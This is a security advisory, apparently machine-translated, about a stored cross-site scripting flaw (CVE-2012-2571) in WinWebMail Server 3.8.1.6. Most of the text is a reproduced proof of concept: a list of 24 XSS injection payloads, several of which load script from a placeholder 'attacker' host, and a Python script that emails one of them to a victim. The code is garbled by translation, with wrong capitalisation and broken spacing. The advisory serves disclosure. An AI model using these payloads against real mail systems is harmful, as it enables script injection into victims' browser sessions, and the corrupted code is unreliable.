Release date:
Updated on:
Affected Systems:
WinWebMail Server 3.x
Description:
--------------------------------------------------------------------------------
Cve id: CVE-2012-2571
WinWebMail Server is a versatile Web mail Server on Windows.
WinWebMail Server 3.8.1.6 and other versions have security vulnerabilities in implementation. If the input in HTML emails is not properly filtered, they can be used to insert arbitrary HTML and script code, after the Web mail interface is opened, it can be executed in the user browser session of the affected site.
<* Source: loneferret
Link: http://www.exploit-db.com/exploits/20366/
Http://secunia.com/advisories/50213/
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
#! /Usr/bin/python
'''
Author: loneferret of Offensive Security
Product: WinWebMail Server
Version: 3.8.1.6
Vendor Site: http://www.winwebmail.net
Software Download: http://www.winwebmail.net/email-server-download.html
Timeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received ed from CERT with disclosure date set to 20 Jul 2012
23 Jul 2012: Update from CERT: No response from vendor
08 Aug 2012: Public Disclosure
Installed On: Windows Server 2003 SP2
Client Test OS: Window 7 Pro SP1 (x86)
Browser Used: Internet Explorer 9
Injection Point: Body
Injection Payload (s ):
1: '; alert (String. fromCharCode (88,83, 83) // \ '; alert (String. fromCharCode (88,83, 83) // "; alert (String. fromCharCode (88,83, 83) // \ "; alert (String. fromCharCode (88,83, 83) // --> </SCRIPT> "> '> <SCRIPT> alert (String. fromCharCode (88,83, 83) </SCRIPT >= &{}
2: <SCRIPT> alert ('xsss') </SCRIPT>
3: <script src = http: // attacker/xss. js> </SCRIPT>
4: <SCRIPT> alert (String. fromCharCode (88,83, 83) </SCRIPT>
5: <div style = "width: expression (alert ('xsss');">
6: <iframe src = "javascript: alert ('xss');"> </IFRAME>
7: exp/* <xss style = 'no \ xss: noxss ("*//*");
Xss: & #101; x & # x2F; * XSS * // */expression (alert ("XSS") '>
8:
9: <xss style = "xss: expression (alert ('xsss')">
10: <! -- [If gte IE 4]>
<SCRIPT> alert ('xss'); </SCRIPT>
<! [Endif] --
11: <script src = "http: // attacker/xss.jpg"> </SCRIPT>
12: 13: </TITLE> <SCRIPT> alert ("XSS"); </SCRIPT>
14: <SCRIPT/xss src = "http: // attacker/xss. js"> </SCRIPT>
15: <SCRIPT> alert ("XSS"); // </SCRIPT>
16: <SCRIPT> alert ("XSS") </SCRIPT> ">
17: <SCRIPT> a =/XSS/
Alert (a. source) </SCRIPT>
18: <SCRIPT a = ">" SRC = "http: // attacker/xss. js"> </SCRIPT>
19: <SCRIPT = "blah" SRC = "http: // attacker/xss. js"> </SCRIPT>
20: <SCRIPT a = "blah" ''src = "http: // attacker/xss. js"> </SCRIPT>
21: <SCRIPT "a = '>'" SRC = "http: // attacker/xss. js"> </SCRIPT>
22: <SCRIPT a = '> 'src = "http: // attacker/xss. js"> </SCRIPT>
23: <SCRIPT> document. write ("<SCRI"); </SCRIPT> pt src = "http: // attacker/xss. js"> </SCRIPT>
24: <SCRIPT a = "> '>" SRC = "http: // attacker/xss. js"> </SCRIPT>
'''
Import smtplib, urllib2
Payload = "" <SCRIPT a = '> 'src = "http: // attacker/xss. js"> </SCRIPT> """
Def sendMail (dstemail, frmemail, smtpsrv, username, password ):
Msg = "From: hacker@offsec.local \ n"
Msg + = "To: victim@victim.local \ n"
Msg + = 'date: Today \ r \ N'
Msg + = "Subject: Offensive Security \ n"
Msg + = "Content-type: text/html \ n"
Msg + = "XSS" + payload + "\ r \ n"
Server = smtplib. SMTP (smtpsrv)
Server. login (username, password)
Try:
Server. sendmail (frmemail, dstemail, msg)
Except t Exception, e:
Print "[-] Failed to send email :"
Print "[*]" + str (e)
Server. quit ()
Username = "hacker@offsec.local"
Password = "123456"
Dstemail = "victim@victim.local"
Frmemail = "hacker@offsec.local"
Smtpsrv = "172.16.84.171"
Print "[*] Sending Email"
SendMail (dstemail, frmemail, smtpsrv, username, password)
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
WinWebMail Server
-----------------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.winwebmail.net/